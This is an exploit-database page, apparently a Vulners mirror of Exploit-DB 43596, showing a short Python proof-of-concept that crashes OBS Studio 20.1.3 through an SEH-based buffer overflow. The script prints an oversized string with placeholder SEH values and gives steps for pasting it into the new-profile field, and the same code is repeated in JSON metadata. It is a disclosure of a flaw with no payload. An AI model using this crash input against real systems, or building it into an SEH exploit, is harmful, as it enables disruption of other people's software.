Search...

OBS Studio 20.1.3 - Local Buffer Overflow

2018-01-15T00:00:00

ID EDB-ID:43596
Type exploitdb
Reporter Exploit-DB
Modified 2018-01-15T00:00:00

Description

OBS Studio 20.1.3 - Local Buffer Overflow. Dos exploit for Windows platform

                                        
                                            author = '''
   
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScR1pTK1dd13.slammer@gmail.com    # 
                ##############################################
   
# Exploit Title: OBS-Studio-20.1.3 Local Buffer Overflow Zer0Day (SEH Based PoC)
# Date: 2018.01.15
# Exploit Author: Greg Priest
# Version: OBS-Studio-20.1.3
# Tested on: Windows7 x64 HUN/ENG Enterprise
# Software Download Link: https://obsproject.com/download

'''

bug = '''
Vulnerable input field:
&lt;1&gt; Copy printed "AAAAA...." string to clipboard!
&lt;2&gt; Profile -&gt; New
&lt;3&gt; Paste the string in the input then press Ok

'''
junk = "A" * 459
SEH = "BBBB"
nextSEH = "CCCC"
overflow = "D" * 19533

print author
print "String: ", junk + SEH + nextSEH + overflow
print bug

JSON Vulners Source

Initial Source

{"id": "EDB-ID:43596", "hash": "362ae5789fe1aa1417ac05a1f0350a4c", "type": "exploitdb", "bulletinFamily": "exploit", "title": "OBS Studio 20.1.3 - Local Buffer Overflow", "description": "OBS Studio 20.1.3 - Local Buffer Overflow. Dos exploit for Windows platform", "published": "2018-01-15T00:00:00", "modified": "2018-01-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/43596/", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2018-01-24T14:22:13", "history": [], "viewCount": 1, "enchantments": {"score": {"vector": "NONE", "value": 9.3}, "vulnersScore": 9.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/43596/", "sourceData": "author = '''\r\n \r\n ##############################################\r\n # Created: ScrR1pTK1dd13 #\r\n # Name: Greg Priest #\r\n # Mail: ScR1pTK1dd13.slammer@gmail.com # \r\n ##############################################\r\n \r\n# Exploit Title: OBS-Studio-20.1.3 Local Buffer Overflow Zer0Day (SEH Based PoC)\r\n# Date: 2018.01.15\r\n# Exploit Author: Greg Priest\r\n# Version: OBS-Studio-20.1.3\r\n# Tested on: Windows7 x64 HUN/ENG Enterprise\r\n# Software Download Link: https://obsproject.com/download\r\n\r\n'''\r\n\r\nbug = '''\r\nVulnerable input field:\r\n<1> Copy printed \"AAAAA....\" string to clipboard!\r\n<2> Profile -> New\r\n<3> Paste the string in the input then press Ok\r\n\r\n'''\r\njunk = \"A\" * 459\r\nSEH = \"BBBB\"\r\nnextSEH = \"CCCC\"\r\noverflow = \"D\" * 19533\r\n\r\nprint author\r\nprint \"String: \", junk + SEH + nextSEH + overflow\r\nprint bug", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}